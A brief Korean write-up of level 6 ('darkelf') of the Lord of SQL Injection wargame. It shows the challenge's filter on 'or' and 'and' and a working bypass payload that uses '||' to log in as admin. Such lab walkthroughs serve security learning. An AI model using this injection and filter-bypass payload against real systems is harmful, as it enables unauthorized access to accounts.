Lord of SQL Injection - 6번 문제 DARKELF

 

 if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 

이번 문제에서는 or 이나 and를 필터링한다.

 

or의 논리 연산자인 || 를 사용하면 되지않을까?

 

?pw=' || id='admin

입력

쉽게 해결했다!